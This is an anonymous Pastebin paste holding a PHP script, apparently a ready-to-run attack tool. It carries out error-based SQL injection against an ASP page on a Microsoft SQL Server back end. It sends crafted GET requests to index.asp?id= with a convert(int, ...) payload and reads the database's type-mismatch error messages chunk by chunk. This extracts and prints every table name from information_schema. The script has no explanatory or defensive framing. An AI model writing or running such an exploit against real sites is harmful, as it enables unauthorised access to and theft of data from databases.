Advertisement
Guest User

Untitled

a guest
May 10th, 2010
357
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. $host = "www.test.net";
  4. $port = 80;
  5.  
  6. for($i=$j=0;;$i+=1990,$j++) {
  7.     $p = "GET /index.asp?id=1'".urlencode(" and 1= (SELECT convert(int,SUBSTRING((SELECT TABLE_NAME AS e FROM information_schema.TABLES FOR XML RAW ('a')),$i,1990)))--")." HTTP/1.0\r\n";
  8.     $p.= "Host: $host\r\n";
  9.     $p.= "Connection: close\r\n\r\n";
  10.  
  11.     $ock = fsockopen(gethostbyname($host), $port);
  12.     if(!$ock) {
  13.         return false;
  14.     }
  15.     fputs($ock, $p);
  16.     $html='';
  17.     while(!feof($ock)) {
  18.         $html.= fgets($ock);
  19.     }
  20.     $html = explode("\r\n\r\n",$html);
  21.     if(stripos($html[1],'type mismatch')!==false) {
  22.         break;
  23.     }
  24.     $out = array();
  25.     preg_match("@the nvarchar value '(.+?)'*( to data type int\.)*</font>@", $html[1], $out);
  26.     if(isset($out[1])) {
  27.         $xml .= htmlspecialchars_decode($out[1]);
  28.     } else {
  29.         break;
  30.     }
  31.  
  32. }
  33.  
  34. $r = xml_parser_create();
  35. $out = array();
  36. xml_parse_into_struct($r, '<root>'.$xml, $out);
  37. foreach($out as $el) {
  38.     echo $el['attributes']['E']."\r\n";
  39. }
Advertisement
RAW Paste Data Copied
Advertisement